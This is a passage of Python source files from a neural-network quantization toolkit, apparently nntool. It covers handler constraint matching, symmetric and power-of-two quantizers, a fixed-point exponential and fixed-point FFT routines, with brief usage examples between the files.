elif isinstance(val, np.ndarray):
if not np.all(val == v):
return False
elif val != v:
return False
return True
def get_closest_qtype(constraint, qtype):
if 'dtype' in constraint:
dtype_constraint = constraint['dtype']
if isinstance(dtype_constraint, set):
            return QType(dtype=next(iter(dtype_constraint)))
return QType(dtype=dtype_constraint)
return None
def match_in_out_qs(handler, name, in_out_qs, ignore_edge=None):
key = f'{name.upper()}_CONSTRAINTS'
constraints = getattr(handler, key)
if not constraints:
return True
for idx, constraint in enumerate(constraints):
# constant input edges always match since a constant can always be requantized
if ignore_edge and ignore_edge[idx]:
continue
if idx >= len(in_out_qs):
return False
if isinstance(constraint, MatchAll):
# match single constrain from here on
return all(True if ignore_edge and ignore_edge[jdx] else
match_qtype(constraint.constraint, in_out_qs[jdx])
for jdx in range(idx, len(in_out_qs)))
if not match_qtype(constraint, in_out_qs[idx]):
return False
return True
def match_in_qs(ignore_edge, handler, in_qs):
return match_in_out_qs(handler, 'INPUT', in_qs, ignore_edge=ignore_edge)
def match_out_qs(handler, out_qs):
return match_in_out_qs(handler, 'OUTPUT', out_qs)
def constrained_in_edges(G, name, in_qs, constraints):
match_all = None
for idx, edge in enumerate(G.indexed_in_edges(name)):
if edge is None:
continue
if match_all:
if match_qtype(constraints.constraint, in_qs[idx]):
continue
yield idx, edge, get_closest_qtype(constraints.constraint, in_qs[idx])
else:
if idx >= len(constraints):
break
if match_qtype(constraints[idx], in_qs[idx]):
continue
yield idx, edge, get_closest_qtype(constraints[idx], in_qs[idx])
def add_handler(handlers, scheme, scheme_handler):
scheme_handlers = handlers.setdefault(scheme, [])
if scheme_handler not in scheme_handlers:
scheme_handlers.append(scheme_handler)
def check_constraints(ignore_edge, handlers, scheme_priorities, in_qs_constraint, out_qs_constraint):
if handlers is None:
return None
# filter any handlers matching input and output constraints
filtered_phandlers = {}
for scheme, scheme_handlers in handlers.items():
for scheme_handler in scheme_handlers:
if in_qs_constraint and not match_in_qs(ignore_edge, scheme_handler, in_qs_constraint):
continue
if out_qs_constraint and not match_out_qs(scheme_handler, out_qs_constraint):
continue
add_handler(filtered_phandlers, scheme, scheme_handler)
# select the handler with the highest scheme priority
for scheme in scheme_priorities:
if scheme in filtered_phandlers:
selected_handlers = filtered_phandlers[scheme]
break
else:
return None
return sorted(selected_handlers, key=lambda x: x.PRIORITY)[0]
def check_option_constraints(handlers, params, options, **kwargs):
filtered_phandlers = {}
for scheme, scheme_handlers in handlers.items():
for scheme_handler in scheme_handlers:
if scheme_handler.OPTION_CONSTRAINT:
for k, v in scheme_handler.OPTION_CONSTRAINT.items():
if k == '__function_constraint':
if not v(params, **kwargs):
break
else:
set_value = options.get(k)
if callable(v):
if not v(set_value, params, **kwargs):
break
elif isinstance(v, set):
if set_value not in v:
break
elif set_value != v:
break
else:
add_handler(filtered_phandlers, scheme, scheme_handler)
else:
add_handler(filtered_phandlers, scheme, scheme_handler)
return filtered_phandlers
def match_handler(graph, handlers, params, scheme_priorities, options,
in_qs_constraint=None, out_qs_constraint=None, **kwargs):
# don't run match on constants or unconnected edges
ignore_edge = [isinstance(edge.from_node, ConstantInputParameters) if edge is not None else True
for edge in graph.indexed_in_edges(params.name)]
# match the class
params_handlers = handlers.get(params.__class__)
params_handlers = check_option_constraints(
params_handlers, params, options, **kwargs)
handler = check_constraints(
ignore_edge, params_handlers, scheme_priorities, in_qs_constraint, out_qs_constraint)
return handler
```
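`match_qtype` above treats a constraint as a dict mapping attribute names to an expected value, a set of allowed values, or a predicate. A small illustration, assuming the module is importable as `quantization.handlers_helpers` (path taken from the file header) and using a `SimpleNamespace` as a stand-in for a real `QType`:
```python
from types import SimpleNamespace
import numpy as np
from quantization.handlers_helpers import match_qtype

# hypothetical qtype stand-in; is_constant=False so the attribute checks actually run
fake_q = SimpleNamespace(is_constant=False, dtype=np.int8, q=7)

print(match_qtype({'dtype': {np.int8, np.int16}}, fake_q))  # True: dtype is in the allowed set
print(match_qtype({'dtype': np.int16}, fake_q))             # False: dtype differs
print(match_qtype({'q': lambda v: v <= 8}, fake_q))         # True: predicate accepts q=7
```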
#### File: quantization/kernels/fusion_inout.py
```python
from quantization.new_qrec import QRec
from graph.types import FusionInputParameters, FusionOutputParameters
from .kernel_base import KernelBase, qrec_type, params_type
@params_type(FusionInputParameters, FusionOutputParameters)
@qrec_type('any')
class FusionNoopKernel(KernelBase):
@classmethod
def execute(cls, params,
in_tensors,
qrec: QRec,
**kwargs):
in_tensor = in_tensors[params.idx]
in_tensor = in_tensor.reshape(params.dims.shape)
return [in_tensor]
```
#### File: quantization/multiplicative/mult_quantization_handler.py
```python
import numpy as np
from quantization.qtype import QType
from quantization.quantizer_options import SQBITS_OPTION_DEFAULT_8
from ..unified_quantization_handler import QuantizionHandler, options, scheme
#pylint: disable=abstract-method
@options(
SQBITS_OPTION_DEFAULT_8
)
@scheme('SQ8')
class MultQuantizionHandler(QuantizionHandler):
BITS_TO_DTYPE = {
8: np.int8,
16: np.int16
}
@classmethod
def get_mult_opts(cls, **kwargs):
force_out_qs = kwargs.get('force_out_qs', None)
opts = kwargs.get('opts', {})
bits = opts.get('sq_bits', 8)
return force_out_qs, cls.BITS_TO_DTYPE[bits]
@classmethod
def force_symmetric(cls, in_qs, idx=None, dtype=None):
res_qs = []
for in_q_idx, in_q in enumerate(in_qs):
            if in_q is None or (idx is not None and idx != in_q_idx):
res_qs.append(in_q)
continue
update = False
if in_q.asymmetric:
# you need to change scale to change zero point
if in_q.forced_zero_point or in_q.forced_scale:
return None
update = True
if dtype is not None and dtype != in_q.dtype:
if in_q.forced_dtype:
return None
update = True
if update:
this_dtype = in_q.dtype if dtype is None else dtype
in_q = QType.from_min_max_sq(in_q.min_val, in_q.max_val,
dtype=this_dtype)
in_q.set_forced('zero_point')
res_qs.append(in_q)
return res_qs
@classmethod
def force_symmetric_and_dtype(cls, in_qs, dtype=None, idx=None):
return cls.force_symmetric(in_qs, idx=idx, dtype=dtype)
@classmethod
def _get_in_qs_from_stats(cls, params, stats, in_qs, **kwargs):
return [QType.from_min_max_sq(stats['range_in'][idx]['min'],
stats['range_in'][idx]['max'],
dtype=np.int8)
if dim is not None else None
for idx, dim in enumerate(params.in_dims)]
@classmethod
def can_handle_asymmetric_input(cls, params, **kwargs):
return False
```
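`force_symmetric` above rebuilds asymmetric input qtypes symmetrically from their min/max range. As a back-of-the-envelope sketch of what a symmetric int8 quantization of a range means (this illustrates the idea only, not the actual `QType.from_min_max_sq` implementation):
```python
import numpy as np

def symmetric_int8_scale(min_val, max_val):
    # symmetric: the zero point is pinned at 0 and the scale covers the larger absolute bound
    bound = max(abs(min_val), abs(max_val))
    return bound / 127.0

scale = symmetric_int8_scale(-0.42, 1.3)
x = np.array([-0.42, 0.0, 0.7, 1.3])
q = np.clip(np.round(x / scale), -128, 127).astype(np.int8)
print(scale, q, q * scale)  # quantize, then dequantize back to float
```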
#### File: quantization/quantizers/concat_mixin.py
```python
import logging
from abc import ABC, abstractmethod
from copy import deepcopy
from quantization.qtype import QType
from quantization.new_qrec import QRec
LOG = logging.getLogger('nntool.' + __name__)
class ConcatMixin(ABC):
@classmethod
def _handle(cls, params, in_qs, _, **kwargs):
force_out_qs = kwargs['force_out_qs']
force_out_q = force_out_qs[0] if force_out_qs else None
forced_in_qs = [in_q for in_q in in_qs if in_q.forced]
# two inputs cannot be forced to different values
if forced_in_qs and not QType.forced_equal(*forced_in_qs):
LOG.info(
'two input qtypes of concat %s are forced to different qtypes', params.name)
return None
# input cannot be forced to different value than output
if force_out_q and not force_out_q.can_force(*forced_in_qs):
LOG.info(
'output and input of concat %s are forced to different qtypes', params.name)
return None
backwards = kwargs.get('backwards')
# if we are going backwards or are forced
if backwards:
if force_out_q:
ok = True
if force_out_q.forced_dtype and any(in_q.dtype != force_out_q.dtype for in_q in in_qs):
ok = False
if force_out_q.forced_zero_point or force_out_q.forced_scale or force_out_q.forced_q:
ok = False
# if output must be forced
if not ok:
in_qs = [deepcopy(force_out_q) for _ in in_qs]
return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(force_out_q)])
# if all the inputs are the same qtype then we output that qtype
if all(in_qs[0] == in_q for in_q in in_qs[1::]):
return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(in_qs[0])])
# our output cannot be forced at this point
# if an input has scale or q forced then all forced inputs must be the same here
# TODO - have a general function for this problem - should pick with force constraints respecting dtype
# if forced_in_qs and any(fin_qs.forced_scale or fin_qs.forced_q for fin_qs in forced_in_qs):
# in_qs = [deepcopy(forced_in_qs[0]) for _ in in_qs]
# return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(forced_in_qs[0])])
# if all the inputs are not the same then force all of them to the maximum input size with a Q that
# fits the most int bits
common_q = cls._get_common_q(in_qs)
in_qs = [deepcopy(common_q) for _ in in_qs]
return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(common_q)])
    KTYPE = None
@classmethod
@abstractmethod
def _get_common_q(cls, in_qs):
pass
```
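Per the comments above, when the concat inputs disagree they are all forced to one common qtype chosen by `_get_common_q`. A purely hypothetical sketch of the "Q that fits the most int bits" idea for pow2 qtypes (not the real `_get_common_q`):
```python
# Hypothetical: pick the smallest fractional bit count among the inputs so every
# integer part still fits (fewer fractional bits = more integer bits).
def common_pow2_q(fractional_bits):
    return min(fractional_bits)

print(common_pow2_q([12, 14, 10]))  # inputs in Q12/Q14/Q10 -> use Q10 for all of them
```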
#### File: quantization/quantizers/no_change_mixin.py
```python
import logging
from copy import deepcopy
from quantization.qtype import QType
from quantization.new_qrec import QRec
LOG = logging.getLogger('nntool.' + __name__)
class NoChangeMixin():
@classmethod
def _handle(cls, params, in_qs, _, ktype, **kwargs):
force_out_qs = kwargs.get('force_out_qs')
force_out_q = force_out_qs and force_out_qs[0]
forced_in_qs = [in_q for in_q in in_qs if in_q.forced]
# two inputs cannot be forced to different values
if forced_in_qs and not QType.forced_equal(*forced_in_qs):
LOG.debug(
'two input qtypes of %s are forced to different qtypes - rejecting', params.name)
return None
# input cannot be forced to different value than output
if force_out_q and not force_out_q.can_force(force_out_q, *in_qs):
LOG.debug(
'output and input of %s are forced to different qtypes - rejecting', params.name)
return None
backwards = kwargs.get('backwards')
if backwards:
if force_out_q:
in_qs = [deepcopy(force_out_q) for _ in in_qs]
return QRec(in_qs=in_qs, out_qs=[deepcopy(force_out_q)], ktype=ktype)
elif force_out_q and not all(in_q == force_out_q for in_q in in_qs):
# if going forwards and our output is forced and does not match input then
# we cannot satisfy
LOG.debug(
"output of %s is forced and inputs don't match - rejecting", params.name)
return None
return QRec(in_qs=in_qs, out_qs=[deepcopy(in_qs[0])], ktype=ktype)
```
#### File: symmetric/quantizers/expression_fusion_pow2.py
```python
import logging
import numpy as np
from expressions.symbolic.q15_quantization.q15_scaled_quantization import \
Q15ScaledQuantization
from expressions.symbolic.symbol import SymbolStats
from graph.types import ExpressionFusionParameters
from quantization.new_qrec import QRec
from quantization.qtype import QType
from quantization.qtype_constraint import MatchAll
from quantization.unified_quantization_handler import (in_qs_constraint,
out_qs_constraint,
params_type)
from ..pow2_quantization_handler import Pow2QuantizionHandler
LOG = logging.getLogger('nntool.' + __name__)
@params_type(ExpressionFusionParameters)
@in_qs_constraint(MatchAll({'dtype': np.int16}))
@out_qs_constraint(MatchAll({'dtype': np.int16}))
class ExpressionFusionPow2(Pow2QuantizionHandler):
@classmethod
def _quantize(cls, params, in_qs, stats, **kwargs):
force_out_qs, out_dtype = cls.get_pow2_opts(**kwargs)
if stats is None or 'expression' not in stats:
raise ValueError(
f'no valid range information is present for {params.name}')
# expressions need a symmetric input
# this is done on the mult8 version but probably isn't necessary here
# in_qs = cls.force_symmetric(in_qs)
symbol_control = SymbolStats(stats['expression'])
# preload the input and output quantization
# This will force variables to the right scales in the expression quantizer
# first the input
prequant = {params.input_symbols[idx]: in_q
for idx, in_q in enumerate(in_qs)}
# now the output
o_qs = []
for idx, sym_name in enumerate(params.output_symbols):
if force_out_qs and force_out_qs[idx]:
o_q = force_out_qs[idx]
else:
cls.check_valid_ranges(params, stats, idx=idx, dirs='out')
o_q = QType.from_min_max_pow2(stats['range_out'][idx]['min'],
stats['range_out'][idx]['max'],
dtype=out_dtype)
prequant[sym_name] = o_q
o_qs.append(o_q)
qfunc_col = params.func_col.quantize(Q15ScaledQuantization,
symbol_control,
quantize_inputs=False,
qtypes=prequant)
return QRec.symmetric(in_qs=in_qs, out_qs=o_qs, qfunc_col=qfunc_col)
@classmethod
def get_prefered_input_dtypes(cls, params, **kwargs):
# only works in 16 bit mode
return [np.int16 for _ in params.in_dims]
```
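The handler above derives pow2 (Q-format) output qtypes from recorded min/max ranges via `QType.from_min_max_pow2`. A rough standalone sketch of that idea for an int16 container (an illustration of the concept, not the real implementation):
```python
import math

def pow2_q_for_range(min_val, max_val, bits=16):
    # choose enough integer bits for the range; the remaining bits become the fractional Q
    max_abs = max(abs(min_val), abs(max_val), 2 ** -15)
    int_bits = max(0, math.ceil(math.log2(max_abs)))
    return bits - 1 - int_bits  # sign bit excluded

print(pow2_q_for_range(-3.2, 5.7))  # 3 integer bits needed -> Q12 in an int16
```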
#### File: symmetric/quantizers/filter_pow2.py
```python
import logging
from copy import deepcopy
import math
import numpy as np
from graph.types import (Conv2DParameters, FcParameters,
MultiplicativeBiasParameters)
from quantization.new_qrec import QRec
from quantization.qtype import QType
from quantization.quantizer_options import BIAS_SIZE_OPTION
from quantization.unified_quantization_handler import (in_qs_constraint,
out_qs_constraint,
params_type, options)
from utils.node_id import NodeId
from utils.stats_funcs import calc_bits
from ..pow2_quantization_handler import Pow2QuantizionHandler
LOG = logging.getLogger('nntool.' + __name__)
@options(
BIAS_SIZE_OPTION
)
@params_type(FcParameters, Conv2DParameters)
# @can_dequantize(True)
@in_qs_constraint({'dtype': set([np.int8, np.int16])})
@out_qs_constraint({'dtype': set([np.int8, np.int16])})
class FilterPow2(Pow2QuantizionHandler):
@classmethod
def get_weights_and_biases_nodes(cls, G, params):
edges = G.indexed_in_edges(params.name)
if len(edges) != 3:
raise ValueError(f"didn't find 3 input edges on {params.name}")
return edges[1].from_node, edges[2].from_node
@classmethod
def _quantize(cls, params, in_qs, stats, **kwargs):
force_out_qs, params_dtype = cls.get_pow2_opts(**kwargs)
force_out_q = force_out_qs and force_out_qs[0]
fusion = kwargs.get('fusion', None)
pow2_biases = kwargs.get('opts')['pow2_biases']
G = kwargs['G']
weights_node, biases_node = cls.get_weights_and_biases_nodes(
G, fusion if fusion else params)
range_acc = stats.get('range_acc', stats['range_out'][0])
conv_active = fusion and fusion.fusion_type in [
'conv_active_pool', 'conv_active']
int_dtype = np.int32
cls.check_valid_ranges(params, stats, idx=0, dirs='out')
if conv_active:
# Take stats from activation after the convolution
range_out = kwargs['all_stats'][NodeId(
fusion, fusion.contained_nodes()[1])]['range_out'][0]
out_dtype = np.int32
else:
out_dtype = params_dtype
range_out = stats['range_out'][0]
in_q = deepcopy(in_qs[0]).scale_to_pow2()
calc_width = 31
o_q = QType.from_min_max_pow2(range_out['min'],
range_out['max'],
dtype=out_dtype)
if force_out_q:
if o_q.scale > force_out_q.scale:
return None
weights_q = QType.from_array_pow2(arr=weights_node.dqvalue,
dtype=params_dtype)
calc_q = in_q.q + weights_q.q
acc_bits = calc_bits(range_acc['max'], range_acc['min'])
act_bits = calc_bits(range_out['min'], range_out['max'])
act_acc_bits = max(acc_bits, act_bits)
calc_int_bits = calc_width - calc_q
if calc_int_bits < act_acc_bits:
# we don't have enough space for the integer portion so reduce the precision of
# the weights and input
missing_bits = act_acc_bits - calc_int_bits
if missing_bits > calc_q * 0.75:
                raise ValueError(f'Quantizing {params.name} at this precision will lose more than 75% of the fractional part')
prec_inp = min(math.floor(0.5 + missing_bits * in_q.q/calc_q), in_q.q)
prec_w = min(math.floor(0.5 + missing_bits * weights_q.q/calc_q), weights_q.q)
left = missing_bits - prec_inp - prec_w
if left > 0:
prec_w += left
LOG.warning(
'reducing weight and input precision (%s, %s) in %s to satisfy quantization constraints', prec_w, prec_inp, params.name)
weights_q.q -= prec_w
in_q.q -= prec_inp
calc_q = in_q.q + weights_q.q
calc_int_bits = calc_width - calc_q
c_q = acc_q = QType(bits=calc_width, q=calc_q, signed=True)
if conv_active:
o_q = c_q
if pow2_biases == 0:
biases_dtype = params_dtype
elif pow2_biases == 8:
biases_dtype = np.int8
elif pow2_biases == 16:
biases_dtype = np.int16
else:
biases_dtype = np.int32
biases_q = QType.from_array_pow2(arr=biases_node.dqvalue,
dtype=biases_dtype)
        # make sure that the biases are not stored more precisely than the accumulator. It's pointless and will
# cause a negative shift
if biases_q.q > acc_q.q:
biases_q.q = acc_q.q
if isinstance(params, MultiplicativeBiasParameters) and params.has_mul_bias:
mb_q = QType.from_array_pow2(arr=params.mul_biases,
dtype=int_dtype)
else:
mb_q = None
return QRec.symmetric(in_qs=[in_q, weights_q, biases_q], out_qs=[o_q], calc_q=c_q,
acc_q=acc_q,
mul_biases_q=mb_q)
```
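The precision-reduction branch in `_quantize` above gives up fractional bits from the input and the weights when the accumulator's integer part would not fit. A worked example with hypothetical numbers, following the same arithmetic:
```python
import math

in_q, w_q, calc_width = 12, 14, 31        # Q12 input, Q14 weights, 32-bit signed accumulator
calc_q = in_q + w_q                       # the product carries 26 fractional bits
act_acc_bits = 7                          # integer bits the accumulator actually needs
missing_bits = act_acc_bits - (calc_width - calc_q)   # 7 - 5 = 2 bits short
prec_inp = min(math.floor(0.5 + missing_bits * in_q / calc_q), in_q)
prec_w = min(math.floor(0.5 + missing_bits * w_q / calc_q), w_q)
prec_w += max(0, missing_bits - prec_inp - prec_w)    # give any remainder to the weights
print(missing_bits, prec_inp, prec_w)     # -> 2 1 1: drop one fractional bit from each
```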
#### File: nntool/utils/exp_17_15.py
```python
import numpy as np
# static unsigned short int IntegerExpLUT[] =
# {
INTEGER_EXP_LUT = np.array([0x0001, 0x0002, 0x0007, 0x0014, 0x0036, 0x0094,
0x0193, 0x0448, 0x0BA4, 0x1FA7, 0x560A, 0xE9E2], dtype=np.uint16)
# };
# static unsigned short int FractionExpLUT[] =
# {
FRACTION_EXP_LUT = np.array([0x0000, 0x5BF1, 0x31CD, 0x0AF3, 0x4C90, 0x34E2,
0x36E3, 0x510B, 0x7A9F, 0x0ABE, 0x3B9F, 0x1224], dtype=np.uint16)
# };
# /* 17.15 fixed point format */
# static unsigned short int ExpCoeffLUT[] =
# {
EXP_COEFF_LUT = np.array([0x7FFF, 0x7FFF, 0x4000, 0x1555, 0x0555, 0x0111, 0x002E, 0x0007, 0x0001])
# };
def gap_bitextractu(x, size, off):
mask = (np.array([1], dtype=np.uint32) << size) - 1
return (x >> off) & mask
def gap_mulsRN(x, y, n):
rounding = np.array([1], dtype=np.int32) << (n - 1)
return (np.multiply(x.astype(np.int16),
y.astype(np.int16), dtype=np.int32) + rounding) >> n
def gap_mulRN(x, y, n):
rounding = np.array([1], dtype=np.int32) << (n - 1)
return (np.multiply(x.astype(np.uint16),
y.astype(np.uint16), dtype=np.int32) + rounding) >> n
def gap_roundnorm(x, scale):
rounding = np.array([1], dtype=np.int32) << (scale - 1)
return (x.astype(np.int32) + rounding) >> scale
def gap_roundnorm_reg(x, scale):
rounding = np.where(x != 0, np.array([1], dtype=np.int32) << (scale - 1), 0)
return (x.astype(np.int32) + rounding) >> scale
def exp_fp_17_15(X):
X = X.astype(np.uint32)
result = np.zeros(X.shape, dtype=np.int32)
zero_mask = X == 0
result[zero_mask] = 0x8000
non_zero_mask = np.logical_not(zero_mask)
Y = np.ndarray(X.shape, dtype=np.int32)
Y[non_zero_mask] = np.abs(X[non_zero_mask].astype(np.int32))
int_x = np.ndarray(X.shape, dtype=np.int32)
int_x[non_zero_mask] = Y[non_zero_mask] >> 15
overflow_mask = np.logical_and(int_x >= (len(INTEGER_EXP_LUT) - 1), non_zero_mask)
    result[np.logical_and(X == Y, overflow_mask)] = 0x7FFFFFFF  # saturate positive overflow
result[np.logical_and(X != Y, overflow_mask)] = 0
non_zero_mask[overflow_mask] = False
fract_x = np.ndarray(X.shape, dtype=np.int32)
fract_x[non_zero_mask] = Y[non_zero_mask] & 0x7FFF
bit_extract_mask = np.logical_and(non_zero_mask, gap_bitextractu(fract_x, 1, 14))
fract_x[bit_extract_mask] -= 0x8000
int_x[bit_extract_mask] += 1
scaled_int = np.ndarray(X.shape, dtype=np.int32)
scaled_int[non_zero_mask] = INTEGER_EXP_LUT[int_x[non_zero_mask]]
scaled_fract = np.ndarray(X.shape, dtype=np.uint16)
scaled_fract[non_zero_mask] = FRACTION_EXP_LUT[int_x[non_zero_mask]]
fract_x_s = fract_x.astype(np.int16)
z_s = fract_x.astype(np.int16)
for i in range(1, len(EXP_COEFF_LUT)):
result[non_zero_mask] += z_s[non_zero_mask].astype(np.int32) * EXP_COEFF_LUT[i]
z_s[non_zero_mask] = gap_mulsRN(z_s[non_zero_mask], fract_x_s[non_zero_mask], 15)
result[non_zero_mask] = gap_roundnorm(result[non_zero_mask], 15) + EXP_COEFF_LUT[0]
unsigned_res = result.astype(np.uint16)
result[non_zero_mask] = (gap_mulRN(unsigned_res[non_zero_mask],
scaled_fract[non_zero_mask], 15)\
+ unsigned_res[non_zero_mask] * scaled_int[non_zero_mask])
neg_mask = np.logical_and(np.logical_and(non_zero_mask, result != 0), X > 0x7FFFFFFF)
result[neg_mask] = ((0x7FFFFFFF)//result[neg_mask]) >> 1
return result.astype(np.uint32)
```
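A quick way to sanity-check `exp_fp_17_15` is to feed it values converted to 17.15 fixed point and compare against `np.exp`; this assumes the module above is importable as `utils.exp_17_15` (path taken from the file header):
```python
import numpy as np
from utils.exp_17_15 import exp_fp_17_15

x = np.array([0.0, 0.5, 1.0, 2.0])
x_fp = np.round(x * (1 << 15)).astype(np.uint32)   # float -> 17.15 fixed point
y_fp = exp_fp_17_15(x_fp)
print(y_fp.astype(np.float64) / (1 << 15))         # 17.15 fixed point -> float
print(np.exp(x))                                   # floating point reference
```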
#### File: nntool/utils/fft_quant.py
```python
import numpy as np
from copy import deepcopy
def Rad2_FFT_DIF_Fix16(In_Data, Twiddles, N_fft):
Data = deepcopy(In_Data)
iLog2N = int(np.log2(N_fft))
iL = 1
iM = N_fft // 2
for iCnt1 in range(iLog2N-3):
iQ = 0
for iCnt2 in range(0, iM):
Wr = np.int64(Twiddles[0, iQ])
Wi = np.int64(Twiddles[1, iQ])
iA = iCnt2
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int64(Data[0, iA]) - Data[0, iB]
Tmpi = np.int64(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]) >> 1)
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]) >> 1)
Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15) >> 1)
Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15) >> 1)
iA = iA + 2 * iM
iQ = iQ + iL
iL *= 2
iM //= 2
iQ = 0
iM = 4
iL = int(N_fft) >> 3
for iCnt2 in range(0, iM):
Wr = Twiddles[0, iQ]
Wi = Twiddles[1, iQ]
iA = iCnt2
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int64(Data[0, iA]) - Data[0, iB]
Tmpi = np.int64(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]))
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]))
Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15))
Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15))
iA = iA + 2 * iM
iQ += iL
iQ = 0
iM = 2
iL = int(N_fft) >> 2
for iCnt2 in range(0, iM):
Wr = Twiddles[0, iQ]
Wi = Twiddles[1, iQ]
iA = iCnt2
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int64(Data[0, iA]) - Data[0, iB]
Tmpi = np.int64(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]))
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]))
Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15))
Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15))
iA = iA + 2 * iM
iQ += iL
iM = 1
iL = N_fft // 2
iA = 0
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int32(Data[0, iA]) - Data[0, iB]
Tmpi = np.int32(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]))
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]))
Data[0, iB] = np.int16(Tmpr)
Data[1, iB] = np.int16(Tmpi)
iA = iA + 2 * iM
return Data
def Rad4_FFT_DIF_Fix16(In_Data, Twiddles, N_fft):
Data = deepcopy(In_Data)
iLog4N = int(np.log2(N_fft)) >> 1
iL = 1
iM = N_fft // 4
for iCnt1 in range(iLog4N-2):
iQ = 0
for iCnt2 in range(0, iM):
W1r = Twiddles[0, iQ]
W1i = Twiddles[1, iQ]
W2r = Twiddles[0, iQ*2]
W2i = Twiddles[1, iQ*2]
W3r = Twiddles[0, iQ*3]
W3i = Twiddles[1, iQ*3]
iA = iCnt2
for iCnt3 in range(iL):
A1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) + (Data[0, iA+iM] + Data[0, iA+3*iM]))
A1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) + (Data[1, iA+iM] + Data[1, iA+3*iM]))
B1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) + (Data[1, iA+iM] - Data[1, iA+3*iM]))
B1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) - (Data[0, iA+iM] - Data[0, iA+3*iM]))
C1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) - (Data[0, iA+iM] + Data[0, iA+3*iM]))
C1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) - (Data[1, iA+iM] + Data[1, iA+3*iM]))
D1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) - (Data[1, iA+iM] - Data[1, iA+3*iM]))
D1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) + (Data[0, iA+iM] - Data[0, iA+3*iM]))
Tmp = B1r
B1r = np.int64(B1r*W1r - B1i*W1i) >> 15
B1i = np.int64(Tmp*W1i + B1i*W1r) >> 15
Tmp = C1r
C1r = np.int64(C1r*W2r - C1i*W2i) >> 15
C1i = np.int64(Tmp*W2i + C1i*W2r) >> 15
Tmp = D1r
D1r = np.int64(D1r*W3r - D1i*W3i) >> 15
D1i = np.int64(Tmp*W3i + D1i*W3r) >> 15
Data[0, iA ] = np.int16(A1r >> 2)
Data[1, iA ] = np.int16(A1i >> 2)
Data[0, iA+ iM] = np.int16(B1r >> 2)
Data[1, iA+ iM] = np.int16(B1i >> 2)
Data[0, iA+2*iM] = np.int16(C1r >> 2)
Data[1, iA+2*iM] = np.int16(C1i >> 2)
Data[0, iA+3*iM] = np.int16(D1r >> 2)
Data[1, iA+3*iM] = np.int16(D1i >> 2)
iA = iA + 4 * iM
iQ += iL
iL = iL * 4
iM = iM // 4
iQ = 0
iM = 4
iL = N_fft // 16
for iCnt2 in range(0, iM):
W1r = Twiddles[0, iQ]
W1i = Twiddles[1, iQ]
W2r = Twiddles[0, iQ*2]
W2i = Twiddles[1, iQ*2]
W3r = Twiddles[0, iQ*3]
W3i = Twiddles[1, iQ*3]
iA = iCnt2
for iCnt3 in range(iL):
A1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) + (Data[0, iA+iM] + Data[0, iA+3*iM]))
A1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) + (Data[1, iA+iM] + Data[1, iA+3*iM]))
B1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) + (Data[1, iA+iM] - Data[1, iA+3*iM]))
B1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) - (Data[0, iA+iM] - Data[0, iA+3*iM]))
C1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) - (Data[0, iA+iM] + Data[0, iA+3*iM]))
C1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) - (Data[1, iA+iM] + Data[1, iA+3*iM]))
D1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) - (Data[1, iA+iM] - Data[1, iA+3*iM]))
D1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) + (Data[0, iA+iM] - Data[0, iA+3*iM]))
Tmp = B1r
B1r = np.int64(B1r*W1r - B1i*W1i) >> 15
B1i = np.int64(Tmp*W1i + B1i*W1r) >> 15
Tmp = C1r
C1r = np.int64(C1r*W2r - C1i*W2i) >> 15
C1i = np.int64(Tmp*W2i + C1i*W2r) >> 15
Tmp = D1r
D1r = np.int64(D1r*W3r - D1i*W3i) >> 15
D1i = np.int64(Tmp*W3i + D1i*W3r) >> 15
Data[0, iA ] = np.int16(A1r)
Data[1, iA ] = np.int16(A1i)
Data[0, iA+ iM] = np.int16(B1r)
Data[1, iA+ iM] = np.int16(B1i)
Data[0, iA+2*iM] = np.int16(C1r)
Data[1, iA+2*iM] = np.int16(C1i)
Data[0, iA+3*iM] = np.int16(D1r)
Data[1, iA+3*iM] = np.int16(D1i)
iA = iA + 4 * iM
iQ += iL
iM = 1
iL = N_fft // 4
iA = 0
for iCnt3 in range(iL):
Ar = np.int32(Data[0, iA])
Ai = np.int32(Data[1, iA])
